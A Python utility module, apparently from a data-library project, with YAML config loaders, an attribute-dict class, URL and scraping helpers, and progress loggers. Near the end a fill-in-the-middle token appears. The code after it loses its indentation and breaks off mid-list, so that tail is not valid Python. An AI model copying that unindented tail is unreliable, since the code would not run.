                queue_appendleft(sentinel)
                for key in filterfalse(refcount.__contains__, iter(queue_pop, sentinel)):
                    queue_appendleft(key)
                    refcount[key] = 1

            return result

        def clear():
            # Reset the cache, usage queue and the hit/miss statistics.
            cache.clear()
            queue.clear()
            refcount.clear()
            wrapper.hits = wrapper.misses = 0

        wrapper.hits = wrapper.misses = 0
        wrapper.clear = clear
        return wrapper

    return decorating_function
class YamlIncludeLoader(yaml.Loader):
    """yaml.Loader that remembers the directory of the stream it was given,
    so relative include paths can later be resolved against it."""

    def __init__(self, stream):
        # Requires a stream with a .name attribute (i.e. a real file object).
        self._root = os.path.split(stream.name)[0]
        super(YamlIncludeLoader, self).__init__(stream)
# From http://pypi.python.org/pypi/layered-yaml-attrdict-config/12.07.1
class OrderedDictYAMLLoader(yaml.Loader):
    """yaml.Loader that builds OrderedDicts for mappings and supports a
    custom `!include <relpath>` tag for pulling in other files.

    Based on: https://gist.github.com/844388
    """

    def __init__(self, *args, **kwargs):
        yaml.Loader.__init__(self, *args, **kwargs)

        # Remember the directory of the underlying file (if any) so that
        # `!include` paths can be resolved relative to it.
        self.dir = None
        for a in args:
            try:
                self.dir = os.path.dirname(a.name)
            except:
                # NOTE(review): bare except — a stream without .name is
                # expected here, but this also hides unrelated errors.
                pass

        # Route both plain maps and ordered maps through construct_yaml_map.
        self.add_constructor(
            'tag:yaml.org,2002:map',
            type(self).construct_yaml_map)
        self.add_constructor(
            'tag:yaml.org,2002:omap',
            type(self).construct_yaml_map)

        self.add_constructor('!include', OrderedDictYAMLLoader.include)

    def construct_yaml_map(self, node):
        # Two-step construction (yield first) so self-referencing YAML
        # anchors resolve correctly.
        data = OrderedDict()
        yield data
        value = self.construct_mapping(node)
        data.update(value)

    def construct_mapping(self, node, deep=False):
        """Build an OrderedDict from a YAML mapping node, rejecting
        unhashable keys with a ConstructorError."""
        if isinstance(node, yaml.MappingNode):
            self.flatten_mapping(node)
        else:
            raise yaml.constructor.ConstructorError(
                None,
                None,
                'expected a mapping node, but found {}'.format(
                    node.id),
                node.start_mark)

        mapping = OrderedDict()
        for key_node, value_node in node.value:
            key = self.construct_object(key_node, deep=deep)
            try:
                hash(key)
            except TypeError as exc:
                raise yaml.constructor.ConstructorError(
                    'while constructing a mapping',
                    node.start_mark,
                    'found unacceptable key ({})'.format(exc),
                    key_node.start_mark)
            value = self.construct_object(value_node, deep=deep)
            mapping[key] = value
        return mapping

    def include(self, node):
        """Load the file named by an `!include` scalar: .yaml files are
        parsed recursively, anything else becomes an IncludeFile string."""
        if not self.dir:
            # NOTE(review): returns an error *string* instead of raising —
            # callers will silently get this text as the included value.
            return "ConfigurationError: Can't include file: wasn't able to set base directory"

        relpath = self.construct_scalar(node)
        abspath = os.path.join(self.dir, relpath)

        if not os.path.exists(abspath):
            raise ConfigurationError(
                "Can't include file '{}': Does not exist".format(abspath))

        with open(abspath, 'r') as f:
            parts = abspath.split('.')
            ext = parts.pop()

            if ext == 'yaml':
                return yaml.load(f, OrderedDictYAMLLoader)
            else:
                return IncludeFile(abspath, relpath, f.read())
# IncludeFile and include_representer ensures that when config files are re-written, they are
# represented as an include, not the contents of the include
class IncludeFile(str):
    """A string holding a file's contents plus the absolute and relative
    paths it was loaded from, so a re-written config can be emitted as an
    `!include` reference instead of inlining the data."""

    def __new__(cls, abspath, relpath, data):
        inst = str.__new__(cls, data)
        inst.abspath = abspath
        inst.relpath = relpath
        return inst
def include_representer(dumper, data):
    """YAML representer for IncludeFile: emit a `!include <relpath>` scalar
    instead of the file's contents, so re-written configs keep the include."""
    return dumper.represent_scalar('!include', data.relpath)
# http://pypi.python.org/pypi/layered-yaml-attrdict-config/12.07.1
class AttrDict(OrderedDict):
    """An OrderedDict whose items are also reachable as attributes.

    Nested mappings are converted to AttrDicts on assignment, so deep
    structures can be navigated as ``cfg.section.key``. Includes helpers to
    flatten/unflatten key paths and to load from / dump to YAML.
    """

    def __init__(self, *argz, **kwz):
        super(AttrDict, self).__init__(*argz, **kwz)

    def __setitem__(self, k, v):
        # Wrap any mapping value so attribute access keeps working below it.
        super(AttrDict, self).__setitem__(k, AttrDict(v) if isinstance(v, Mapping) else v)

    def __getattr__(self, k):
        # Dunder and OrderedDict-internal names go through normal attribute
        # lookup; everything else is treated as an item key.
        if not (k.startswith('__') or k.startswith('_OrderedDict__')):
            return self[k]
        else:
            return super(AttrDict, self).__getattr__(k)

    def __setattr__(self, k, v):
        if k.startswith('_OrderedDict__'):
            return super(AttrDict, self).__setattr__(k, v)
        self[k] = v

    def __iter__(self):
        return iterkeys(super(OrderedDict, self))

    ##
    # __enter__ and __exit__ allow for assigning a path to a variable
    # with 'with', which isn't extra functionality but looks pretty.
    ##

    def __enter__(self):
        return self

    def __exit__(self, type_, value, traceback):
        # Never suppresses exceptions.
        return False

    @classmethod
    def from_yaml(cls, path, if_exists=False):
        """Load an AttrDict from a YAML file. With if_exists=True, a missing
        file yields an empty AttrDict instead of raising."""
        if if_exists and not os.path.exists(path):
            return cls()

        with open(path) as f:
            return cls(yaml.load(f, OrderedDictYAMLLoader) or {})

    @staticmethod
    def flatten_dict(data, path=tuple()):
        """Flatten a nested mapping into a list of (key-path-tuple, value)."""
        dst = list()
        for k, v in iteritems(data):
            k = path + (k,)
            if isinstance(v, Mapping):
                for v in v.flatten(k):
                    dst.append(v)
            else:
                dst.append((k, v))
        return dst

    def flatten(self, path=tuple()):
        return self.flatten_dict(self, path=path)

    def update_flat(self, val):
        """Merge flattened (key-path, value) pairs back into this tree,
        creating intermediate AttrDicts as needed."""
        if isinstance(val, AttrDict):
            val = val.flatten()

        for k, v in val:
            dst = self

            for slug in k[:-1]:
                if dst.get(slug) is None:
                    dst[slug] = AttrDict()
                dst = dst[slug]

            # Don't overwrite an existing sub-tree with a bare None.
            if v is not None or not isinstance(dst.get(k[-1]), Mapping):
                dst[k[-1]] = v

    def unflatten_row(self, k, v):
        """Insert a single flattened (key-path, value) pair; None path
        components are skipped."""
        dst = self
        for slug in k[:-1]:
            if slug is None:
                continue
            if dst.get(slug) is None:
                dst[slug] = AttrDict()
            dst = dst[slug]

        if v is not None or not isinstance(dst.get(k[-1]), Mapping):
            dst[k[-1]] = v

    def update_yaml(self, path):
        self.update_flat(self.from_yaml(path))
        return self

    def to_dict(self):
        """Return a copy of the tree using plain dicts."""
        root = {}
        val = self.flatten()
        for k, v in val:
            dst = root

            for slug in k[:-1]:

                if dst.get(slug) is None:
                    dst[slug] = dict()
                dst = dst[slug]
            if v is not None or not isinstance(dst.get(k[-1]), Mapping):
                dst[k[-1]] = v

        return root

    def update_dict(self, data):
        self.update_flat(self.flatten_dict(data))

    def clone(self):
        """Deep-copy this tree into a new AttrDict."""
        clone = AttrDict()
        clone.update_dict(self)
        return clone

    def rebase(self, base):
        """Rebuild this dict as *base* overridden by the current contents."""
        base = base.clone()
        base.update_dict(self)
        self.clear()
        self.update_dict(base)

    def dump(self, stream=None, map_view=None):
        """Serialize to YAML. Returns the string when no stream was given;
        map_view (a MapView) can restrict which top-level keys are emitted.

        Registers SafeRepresenter entries for the project's mutable/ordered
        container types so safe_dump can handle them.
        """
        from ambry.metadata.proptree import _ScalarTermS, _ScalarTermU
        from ambry.orm import MutationList, MutationDict  # cross-module import

        yaml.representer.SafeRepresenter.add_representer(
            MapView, yaml.representer.SafeRepresenter.represent_dict)

        yaml.representer.SafeRepresenter.add_representer(
            AttrDict, yaml.representer.SafeRepresenter.represent_dict)

        yaml.representer.SafeRepresenter.add_representer(
            OrderedDict, yaml.representer.SafeRepresenter.represent_dict)

        yaml.representer.SafeRepresenter.add_representer(
            defaultdict, yaml.representer.SafeRepresenter.represent_dict)

        yaml.representer.SafeRepresenter.add_representer(
            MutationDict, yaml.representer.SafeRepresenter.represent_dict)

        yaml.representer.SafeRepresenter.add_representer(
            set, yaml.representer.SafeRepresenter.represent_list)

        yaml.representer.SafeRepresenter.add_representer(
            MutationList, yaml.representer.SafeRepresenter.represent_list)

        yaml.representer.SafeRepresenter.add_representer(
            IncludeFile, include_representer)

        yaml.representer.SafeRepresenter.add_representer(
            _ScalarTermS, yaml.representer.SafeRepresenter.represent_str)

        yaml.representer.SafeRepresenter.add_representer(
            _ScalarTermU, yaml.representer.SafeRepresenter.represent_str)

        if stream is None:
            stream = StringIO()

        d = self
        if map_view is not None:
            map_view.inner = d
            d = map_view

        try:
            yaml.safe_dump(d, stream, default_flow_style=False, indent=4, encoding='utf-8')
        except RepresenterError:
            # Dump the offending structure for diagnosis before re-raising.
            pprint.pprint(self.to_dict())
            raise

        if isinstance(stream, StringIO):
            return stream.getvalue()

    def json(self):
        """Round-trip through YAML to produce a JSON string."""
        o = yaml.load(self.dump())
        return json.dumps(o)
class MapView(MutableMapping):
    """A map that provides a limited view on an underlying, inner map.

    Iterating over the view returns only the keys specified in the *keys*
    argument (or all keys when none were given). Item lookup and deletion
    still reach every key of the inner map; item assignment is forbidden.
    Unknown attributes are delegated to the inner map.
    """

    _inner = None
    _keys = None

    def __init__(self, d=None, keys=None):
        self._inner = d
        self._keys = keys

    @property
    def inner(self):
        return self._inner

    @inner.setter
    def inner(self, value):
        self._inner = value

    def __getitem__(self, key):
        return self._inner.__getitem__(key)

    def __setitem__(self, key, value):
        # The view is read-only. (The original had an unreachable
        # fall-through to the inner map after this raise; it was dead code
        # and has been removed.)
        raise NotImplementedError()

    def __delitem__(self, key):
        return self._inner.__delitem__(key)

    def __len__(self):
        return self._inner.__len__()

    def __iter__(self):
        for k in self._inner:
            if not self._keys or k in self._keys:
                yield k

    def __getattr__(self, item):
        # Fall back to the wrapped map for anything the view doesn't define.
        return getattr(self._inner, item)
class CaseInsensitiveDict(Mapping):  # http://stackoverflow.com/a/16202162
    """Mapping wrapper that gives case-insensitive key access to a backing
    dict while remembering each key's original spelling."""

    def __init__(self, d):
        self._d = d
        # Map lower-cased key -> the key's original spelling.
        self._s = {key.lower(): key for key in d}

    def __contains__(self, k):
        return k.lower() in self._s

    def __len__(self):
        return len(self._s)

    def __iter__(self):
        # NOTE: iterates the lower-cased keys, not the original spellings.
        return iter(self._s)

    def __getitem__(self, k):
        return self._d[self._s[k.lower()]]

    def __setitem__(self, k, v):
        self._d[k] = v
        self._s[k.lower()] = k

    def pop(self, k):
        original = self._s.pop(k.lower())
        return self._d.pop(original)

    def actual_key_case(self, k):
        """Return the original spelling of *k*, or None if absent."""
        return self._s.get(k.lower())
def lowercase_dict(d):
    """Return a copy of *d* with every key lower-cased."""
    return {key.lower(): value for key, value in d.items()}
def configure_logging(cfg, custom_level=None):
    """Apply a logging dictConfig, substituting levels marked 'custom'.

    NOTE(review): `it.imap` and the `viewvalues` method are Python-2-only;
    as written this function raises AttributeError on Python 3 — confirm it
    is dead code or port it. It also expects `cfg` to expose a `warnings`
    attribute for logging.captureWarnings.
    """
    import itertools as it
    import operator as op

    if custom_level is None:
        custom_level = logging.WARNING
    # Walk the values of the top-level config plus its 'handlers' and
    # 'loggers' sections, replacing any level marked 'custom'.
    for entity in it.chain.from_iterable(it.imap(op.methodcaller('viewvalues'),
                                                 [cfg] + [cfg.get(k, dict()) for k in ['handlers', 'loggers']])):
        if isinstance(entity, Mapping) and entity.get('level') == 'custom':
            entity['level'] = custom_level
    logging.config.dictConfig(cfg)
    logging.captureWarnings(cfg.warnings)
# {{{ http://code.activestate.com/recipes/578272/ (r1)
def toposort(data):
    """Dependencies are expressed as a dictionary whose keys are items and
    whose values are a set of dependent items. Yields sets of items in
    topological order: the first set consists of items with no dependencies,
    each subsequent set consists of items that depend upon items in the
    preceding sets. Mutates *data*; raises AssertionError on a cycle.

    >>> print '\\n'.join(repr(sorted(x)) for x in toposort({
    ...     2: set([11]),
    ...     9: set([11,8]),
    ...     10: set([11,3]),
    ...     11: set([7,5]),
    ...     8: set([7,3]),
    ...     }) )
    [3, 5, 7]
    [8, 11]
    [2, 9, 10]

    """

    # Ignore self dependencies.
    for k, v in iteritems(data):
        v.discard(k)
    # Find all items that don't depend on anything.
    extra_items_in_deps = reduce(
        set.union, itervalues(data)) - set(data.keys())
    # Add empty dependences where needed
    data.update({item: set() for item in extra_items_in_deps})
    while True:
        # Everything with no remaining dependencies can be emitted together.
        ordered = set(item for item, dep in iteritems(data) if not dep)
        if not ordered:
            break
        yield ordered
        # Remove the emitted items from the remaining dependency sets.
        data = {item: (dep - ordered)
                for item, dep in iteritems(data)
                if item not in ordered}
    # Anything left over is part of a dependency cycle.
    assert not data, 'Cyclic dependencies exist among these items:\n%s' % '\n'.join(
        repr(x) for x in list(data.items()))
# end of http://code.activestate.com/recipes/578272/ }}}
def md5_for_stream(f, block_size=2 ** 20):
    """Return the hex MD5 digest of a file-like object, read in chunks so
    arbitrarily large streams fit in memory."""
    digest = hashlib.md5()
    chunk = f.read(block_size)
    while chunk:
        digest.update(chunk)
        chunk = f.read(block_size)
    return digest.hexdigest()
def md5_for_file(f, block_size=2 ** 20):
    """Generate an MD5 hash for a possibly large file by breaking it into
    chunks. *f* may be a file-like object or a path string."""
    try:
        # Assume a file-like object first; rewind and hash the stream.
        f.seek(0)
        return md5_for_stream(f, block_size=block_size)
    except AttributeError:
        # No seek(): treat *f* as a path and open it ourselves.
        with open(f, 'rb') as fp:
            return md5_for_file(fp, block_size)
def make_acro(past, prefix, s):  # pragma: no cover
    """Create a three letter acronym from the input string s.

    Args:
        past: A set object, for storing acronyms that have already been created
        prefix: A prefix added to the acronym before storing in the set
        s: The string to create the acronym from.

    Returns:
        the acronym (without the prefix).

    Raises:
        Exception: if no unused acronym could be generated in 11 attempts.
    """

    def _make_acro(s, t=0):
        """Make an acronym of s for trial t; each trial tries a different
        vowel/consonant combination, falling back to plain substrings."""

        # Really should cache these ...
        v = ['a', 'e', 'i', 'o', 'u', 'y']
        c = [chr(x) for x in six_xrange(ord('a'), ord('z') + 1) if chr(x) not in v]

        s = re.sub(r'\W+', '', s.lower())

        vx = [x for x in s if x in v]  # Vowels in input string
        cx = [x for x in s if x in c]  # Consonants in input string

        if s.startswith('Mc'):
            # NOTE(review): unreachable — s was lower-cased above, so it can
            # never start with 'Mc'; presumably meant to test before lower().
            if t < 1:
                return 'Mc' + v[0]
            if t < 2:
                return 'Mc' + c[0]

        if s[0] in v:  # Starts with a vowel
            if t < 1:
                return vx[0] + cx[0] + cx[1]
            if t < 2:
                return vx[0] + vx[1] + cx[0]

        if s[0] in c and s[1] in c:  # Two first consonants
            if t < 1:
                return cx[0] + cx[1] + vx[0]
            if t < 2:
                return cx[0] + cx[1] + cx[2]

        if t < 3:
            return cx[0] + vx[0] + cx[1]
        if t < 4:
            return cx[0] + cx[1] + cx[2]
        if t < 5:
            return cx[0] + vx[0] + vx[1]
        if t < 6:
            return cx[0] + cx[1] + cx[-1]

        # These are punts; just take a substring
        if t < 7:
            return s[0:3]
        if t < 8:
            return s[1:4]
        if t < 9:
            return s[2:5]
        if t < 10:
            return s[3:6]

        return None

    # Try multiple forms until one isn't in the past acronyms; IndexError
    # (input too short for a given combination) just moves to the next trial.
    for t in six_xrange(11):

        try:
            a = _make_acro(s, t)

            if a is not None:
                if prefix:
                    aps = prefix + a
                else:
                    aps = a

                if aps not in past:
                    past.add(aps)
                    return a

        except IndexError:
            pass

    raise Exception('Could not get acronym.')
def ensure_dir_exists(path):
    """Given a file path, create its parent directory if it does not already
    exist, and return that directory."""
    import os

    parent = os.path.dirname(path)
    if not os.path.exists(parent):
        os.makedirs(parent)
    return parent
def walk_dict(d):
    """Walk a tree of nested dicts.

    For each dict in the tree, yields a 3-tuple (path, sub_dicts, values)
    where path is the '/'-terminated location of the dict, sub_dicts is a
    list of (key, dict) pairs for its nested dicts, and values is a tuple of
    (key, value) pairs for its non-dict items.
    """
    branches = tuple(k for k, v in d.items() if isinstance(v, dict))
    leaves = tuple((k, v) for k, v in d.items() if k not in branches)

    # Report this level, then recurse into each nested dict, prefixing the
    # child's paths with this key.
    yield ('/', [(k, d[k]) for k in branches], leaves)
    for key in branches:
        for path, subs, vals in walk_dict(d[key]):
            yield ('/%s' % key + path, subs, vals)
def init_log_rate(output_f, N=None, message='', print_rate=None):
    """Initialize the log_rate function. Returns a partial function to call
    for each event.

    If N is not specified but print_rate is specified, the initial N is
    set to 100, and after the first message, the N value is adjusted to
    emit print_rate messages per second
    """

    if print_rate and not N:
        N = 100

    if not N:
        N = 5000

    # Mutable state shared with _log_rate via the partial below.
    d = [0,  # number of items processed
         time(),  # start time. This one gets replaced after first message
         N,  # ticker to next message
         N,  # frequency to log a message
         message,
         print_rate,
         deque([], maxlen=4)  # Deque for averaging last N rates
         ]

    assert isinstance(output_f, Callable)

    f = partial(_log_rate, output_f, d)
    f.always = output_f        # direct, unthrottled access to the output fn
    f.count = lambda: d[0]     # how many events have been recorded so far
    return f
def _log_rate(output_f, d, message=None):
    """Log a message for the Nth time the method is called.

    d is the mutable state list returned from init_log_rate:
    [count, start_time, ticker, frequency, message, print_rate, rate_deque].
    """

    if d[2] <= 0:

        if message is None:
            message = d[4]

        # Average the rate over the length of the deque.
        d[6].append(int(d[3] / (time() - d[1])))
        rate = sum(d[6]) / len(d[6])

        # Prints the processing rate in 1,000 records per sec.
        output_f(message + ': ' + str(rate) + '/s ' + str(d[0] / 1000) + 'K ')

        d[1] = time()

        # If the print_rate was specified, adjust the number of records to
        # approximate that rate.
        if d[5]:
            target_rate = rate * d[5]
            d[3] = int((target_rate + d[3]) / 2)

        d[2] = d[3]

    d[0] += 1
    d[2] -= 1
class Progressor(object):
    """Progress reporter suitable for calling in Library.get()

    Example: r = l.get(args.term, cb=Progressor().progress)
    """

    start = None
    last = None
    freq = 5  # minimum seconds between printed updates

    def __init__(self, message='Download', printf=print_):
        # BUG FIX: the module does `from time import time`, so `time` is the
        # function itself; the previous `time.clock()` raised AttributeError
        # (and time.clock was removed in Python 3.8 anyway).
        self.start = time()
        self.message = message
        self.rates = deque(maxlen=10)
        self.printf = printf

    def progress(self, i, n):
        """Callback: *i* bytes downloaded of *n* compressed bytes total."""

        now = time()

        if not self.last:
            self.last = now

        if now - self.last > self.freq:
            diff = now - self.start
            self.last = now
            i_rate = float(i) / diff
            self.rates.append(i_rate)

            if len(self.rates) > self.rates.maxlen / 2:
                # Enough samples: report the averaged ('a') rate.
                rate = sum(self.rates) / len(self.rates)
                rate_type = 'a'
            else:
                # Early on: report the instantaneous ('i') rate.
                rate = i_rate
                rate_type = 'i'

            msg = '{}: Compressed: {} Mb. Downloaded, Uncompressed: {:6.2f} Mb, {:5.2f} Mb / s ({})'\
                .format(
                    self.message, int(int(n) / (1024 * 1024)),
                    round(float(i) / (1024. * 1024.), 2),
                    round(float(rate) / (1024 * 1024), 2), rate_type)

            self.printf(msg)
# http://stackoverflow.com/a/1695250
# >>> Numbers = enum('ZERO', 'ONE', TWO = 20, THREE = 30)
# >>> print Numbers.ONE
# >>> print Numbers.THREE
def enum(*sequential, **named):
    """Build a simple enum-like class: positional names get the values
    0..n-1, keyword names keep their given values."""
    members = {name: index for index, name in enumerate(sequential)}
    members.update(named)
    return type('Enum', (), members)
class Constant:
    """Namespace for write-once constants: assigning to an existing name
    raises ConstError."""

    class ConstError(TypeError):
        """Raised on an attempt to rebind an already-set constant."""

    def __setattr__(self, name, value):
        if name in self.__dict__:
            raise self.ConstError("Can't rebind const(%s)" % name)
        self.__dict__[name] = value
def count_open_fds():
    """return the number of open file descriptors for current process.

    .. warning: will only work on UNIX-like os-es (requires the `lsof`
       binary on PATH).

    http://stackoverflow.com/a/7142094
    """
    pid = os.getpid()
    # BUG FIX: check_output returns bytes on Python 3; decode before
    # splitting, otherwise split('\n') raises TypeError.
    procs = subprocess.check_output(
        ['lsof', '-w', '-Ff', '-p', str(pid)]).decode('utf-8', 'replace')

    # lsof -Ff emits one 'f<fd>' line per descriptor; count the numeric ones.
    nprocs = len(
        [s for s in procs.split('\n') if s and s[0] == 'f' and s[1:].isdigit()]
    )
    return nprocs
def parse_url_to_dict(url):
    """Parse a url and return a plain dict with one key per URL component.

    Flattens urlparse()'s wacky combination of tuple fields and properties
    into a single dict.
    """
    parts = urlparse(url)
    fields = ('scheme', 'netloc', 'path', 'params', 'query', 'fragment',
              'username', 'password', 'hostname', 'port')
    return {name: getattr(parts, name) for name in fields}
def unparse_url_dict(d):
    """Reassemble a URL string from a dict like parse_url_to_dict() returns.

    Missing components are skipped; the scheme defaults to 'http'.
    """
    netloc = d.get('hostname') or ''

    if d.get('port'):
        netloc += ':' + str(d['port'])

    credentials = ''
    if d.get('username'):
        credentials += d['username']
    if d.get('password'):
        credentials += ':' + d['password']
    if credentials:
        netloc = '{}@{}'.format(credentials, netloc)

    url = '{}://{}/{}'.format(d.get('scheme', 'http'),
                              netloc, d.get('path', '').lstrip('/'))

    if d.get('query'):
        url += '?' + d['query']

    return url
def set_url_part(url, **kwargs):
    """Return *url* with the given components (scheme, hostname, ...)
    replaced by the keyword values."""
    parts = parse_url_to_dict(url)
    parts.update(kwargs)
    return unparse_url_dict(parts)
def filter_url(url, **kwargs):
    """Rebuild *url* keeping only the truthy components, after applying the
    keyword overrides."""
    parts = parse_url_to_dict(url)
    parts.update(kwargs)
    kept = {name: value for name, value in parts.items() if value}
    return unparse_url_dict(kept)
def select_from_url(url, key):
    """Return a single parsed component of *url* (e.g. 'hostname'), or None
    if the key is unknown."""
    return parse_url_to_dict(url).get(key)
def normalize_newlines(string):
    """Normalize all line endings (CRLF, lone CR) to bare LF."""
    return string.replace('\r\n', '\n').replace('\r', '\n')
def print_yaml(o):
    """Pretty print an object as YAML (block style, 4-space indent, UTF-8
    encoded output)."""
    print(yaml.dump(o, default_flow_style=False, indent=4, encoding='utf-8'))
def qualified_class_name(o):
    """Full name of an object's class, including the module. The module
    prefix is omitted for builtins."""
    cls = o.__class__
    module = cls.__module__
    if module is None or module == str.__class__.__module__:
        return cls.__name__
    return '{}.{}'.format(module, cls.__name__)
def qualified_name(cls):
    """Full name of a class, including the module. Like qualified_class_name,
    but for when you already have the class object. Builtins are returned
    without a module prefix."""
    module = cls.__module__
    if module is None or module == str.__class__.__module__:
        return cls.__name__
    return '{}.{}'.format(module, cls.__name__)
def qualified_name_import(cls):
    """Return an import statement ('from pkg import Name') for *cls*."""
    dotted = qualified_name(cls).split('.')
    return 'from {} import {}'.format('.'.join(dotted[:-1]), dotted[-1])
class _Getch:
    """Gets a single character from standard input. Does not echo to the
    screen.

    Chooses the Windows (msvcrt) implementation when it is importable,
    otherwise falls back to the Unix termios-based one.
    """

    def __init__(self):
        try:
            self.impl = _GetchWindows()
        except ImportError:
            self.impl = _GetchUnix()

    def __call__(self):
        return self.impl()
# from http://code.activestate.com/recipes/134892/
class _GetchUnix:
    """Read one character from stdin on Unix, temporarily switching the
    terminal into cbreak mode so no Enter key is required."""

    def __init__(self):
        # Import eagerly so a missing tty module fails at construction time,
        # letting _Getch fall back correctly.
        import tty, sys

    def __call__(self):
        import sys, tty, termios
        fd = sys.stdin.fileno()
        old_settings = termios.tcgetattr(fd)
        try:
            # Originally was raw mode, not cbreak, but raw screws up printing.
            tty.setcbreak(sys.stdin.fileno())
            ch = sys.stdin.read(1)
        finally:
            # Always restore the caller's terminal settings.
            termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
        return ch
class _GetchWindows:
    """Read one character from the console on Windows via msvcrt.getch()."""

    def __init__(self):
        # Import eagerly so construction fails with ImportError off-Windows.
        import msvcrt

    def __call__(self):
        import msvcrt
        return msvcrt.getch()
getch = _Getch()
def scrape(library, url, as_html=False):
    """Dispatch scraping: 's3:' URLs are walked through the library's S3
    filesystem; anything else is treated as a web page to scan for links."""
    if url.startswith('s3:'):
        s3 = library.filesystem.s3(url)
        return scrape_s3(url, s3, as_html=as_html)
    else:
        return scrape_urls_from_web_page(url)
def scrape_s3(root_url, s3, as_html=False):
    """Walk every file in an S3 pseudo-filesystem and return them as
    'sources' entries (same shape as scrape_urls_from_web_page's result).

    With as_html=True the signed path URL from the filesystem is used
    (query string stripped); otherwise the URL is root_url joined with the
    file's path.
    """
    from os.path import join

    d = dict(external_documentation={}, sources={}, links={})

    for f in s3.walkfiles('/'):

        if as_html:
            try:
                # Drop the signature query string, if present.
                url, _ = s3.getpathurl(f).split('?', 1)
            except ValueError:
                url = s3.getpathurl(f)
        else:
            url = join(root_url, f.strip('/'))

        fn = f.strip('/')

        d['sources'][fn] = dict(url=url, description='', title=fn)

    return d
def scrape_urls_from_web_page(page_url):
    """Fetch *page_url* and sort its anchor links into three buckets:
    'sources' (data-file extensions), 'external_documentation' (pdf/html)
    and 'links' (everything else). Relative hrefs are resolved against the
    page or site root; javascript: and fragment links are skipped."""
    parts = list(urlsplit(page_url))
    parts[2] = ''  # clear the path to get the site root
    root_url = urlunsplit(parts)

    html_page = urlopen(page_url)
    soup = BeautifulSoup(html_page)

    d = dict(external_documentation={}, sources={}, links={})

    for link in soup.findAll('a'):

        if not link:
            continue

        if link.string:
            text = str(link.string.encode('ascii', 'ignore'))
        else:
            text = 'None'

        url = link.get('href')

        if not url:
            continue

        if 'javascript' in url:
            continue

        if url.startswith('http'):
            pass
        elif url.startswith('/'):
            # Site-absolute link: resolve against the site root.
            url = os.path.join(root_url, url)
        else:
            # Page-relative link.
            url = os.path.join(page_url, url)

        base = os.path.basename(url)

        if '#' in base:
            continue

        try:
            fn, ext = base.split('.', 1)
        except ValueError:
            fn = base
            ext = ''

        try:  # Yaml adds a lot of junk to encode unicode. # FIXME. Should use safe_dump instead
            fn = str(fn)
            url = str(url)
            text = str(text)
        except UnicodeDecodeError:
            pass

        # xlsm is a bug that adds 'm' to the end of the url. No idea.
        if ext.lower() in ('zip', 'csv', 'xls', 'xlsx', 'xlsm', 'txt'):
            d['sources'][fn] = dict(url=url, description=text)

        elif ext.lower() in ('pdf', 'html'):
            d['external_documentation'][fn] = dict(url=url, description=text, title=text)

        else:
            d['links'][text] = dict(url=url, description=text, title=text)

    return d
def drop_empty(rows):
    """Drop columns that have a header but no data in the body.

    Transposes *rows* into columns, keeps only columns with at least one
    truthy value after the first (header) cell, and transposes back.
    Returns an iterator of tuples, matching zip()'s return type.
    """
    # BUG FIX: the old test `bool(filter(bool, col[1:]))` was always True on
    # Python 3, where filter() returns a (truthy) iterator object; any()
    # restores the intended "has any non-empty body cell" check.
    return zip(*[col for col in zip(*rows) if any(col[1:])])
# http://stackoverflow.com/a/20577580
def dequote(s):
    """
    If a string has single or double quotes around it, remove them.
    Make sure the pair of quotes match.
    If a matching pair of quotes is not found, return the string unchanged.
    """
    # BUG FIX: guard on length — previously '' raised IndexError and a lone
    # quote character collapsed to '' (it isn't a *pair* of quotes).
    if len(s) >= 2 and (s[0] == s[-1]) and s.startswith(("'", '"')):
        return s[1:-1]
    return s
def pretty_time(s, granularity=3):
    """Pretty print a duration given in seconds.

    Converts *s* into a comma-separated string of named intervals (weeks,
    days, hours, minutes, seconds), keeping at most *granularity* parts.

    From: http://stackoverflow.com/a/24542445/1144479
    """
    intervals = (
        ('weeks', 604800),    # 60 * 60 * 24 * 7
        ('days', 86400),      # 60 * 60 * 24
        ('hours', 3600),      # 60 * 60
        ('minutes', 60),
        ('seconds', 1),
    )

    parts = []
    remaining = s
    for name, count in intervals:
        amount = remaining // count
        if amount:
            remaining -= amount * count
            # Singular form when the amount is exactly one.
            label = name.rstrip('s') if amount == 1 else name
            parts.append('{} {}'.format(int(amount), label))

    return ', '.join(parts[:granularity])
# From: http://code.activestate.com/recipes/391367-deprecated/
def deprecated(func):
    """This is a decorator which can be used to mark functions
    as deprecated. It will result in a warning being emitted
    when the function is used."""

    # Use functools.wraps (already imported at module top) instead of the
    # manual __name__/__doc__/__dict__ copying: it additionally preserves
    # __module__, __qualname__ and sets __wrapped__.
    @wraps(func)
    def newFunc(*args, **kwargs):
        warnings.warn("Call to deprecated function %s." % func.__name__,
                      category=DeprecationWarning)
        return func(*args, **kwargs)

    return newFunc
def int_maybe(v):
    """Convert *v* to an int, returning None instead of raising on failure."""
    try:
        result = int(v)
    except (TypeError, ValueError):
        result = None
    return result
<|fim▁hole|>def random_string(length):
import random
import string
return ''.join(random.SystemRandom().choice(string.ascii_lowercase + string.ascii_uppercase + string.digits)
for _ in range(length))
# From: http://code.activestate.com/recipes/496741-object-proxying/
class Proxy(object):
__slots__ = ["_obj", "__weakref__"]
def __init__(self, obj):
object.__setattr__(self, "_obj", obj)
#
# proxying (special cases)
#
def __getattribute__(self, name):
return getattr(object.__getattribute__(self, "_obj"), name)
def __delattr__(self, name):
delattr(object.__getattribute__(self, "_obj"), name)
def __setattr__(self, name, value):
setattr(object.__getattribute__(self, "_obj"), name, value)
def __nonzero__(self):
return bool(object.__getattribute__(self, "_obj"))
def __str__(self):
return str(object.__getattribute__(self, "_obj"))
def __repr__(self):
return repr(object.__getattribute__(self, "_obj"))
#
# factories
#
_special_names = [
'__abs__', '__add__', '__and__', '__call__', '__cmp__', '__coerce__',
'__contains__', '__delitem__', '__delslice__', '__div__', '__divmod__',
'__eq__', '__float__', '__floordiv__', '__ge__', '__getitem__',
'__getslice__', '__gt__', '__hash__', '__hex__', '__iadd__', '__iand__',
'__idiv__', '__idivmod__', '__ifloordiv__', '__ilshift__', '__imod__',
'__imul__', '__int__', '__invert__', '__ior__', '__ipow__', '__irshift__',
'__isub__', '__iter__', '__itruediv__', '__ixor__', '__le__', '__len__',
'__long__', '__lshift__', '__lt__', '__mod__', '__mul__', '__ne__',
'__neg__', '__oct__', '__or__', '__pos__', '__pow__', '__radd__',
'__rand__', '__rdiv__', '__rdivmod__', '__reduce__', '__reduce_ex__',
'__repr__', '__reversed__', '__rfloorfiv__', '__rlshift__', '__rmod__',
'__rmul__', '__ror__', '__rpow__', '__rrshift__', '__rshift__', '__rsub__',
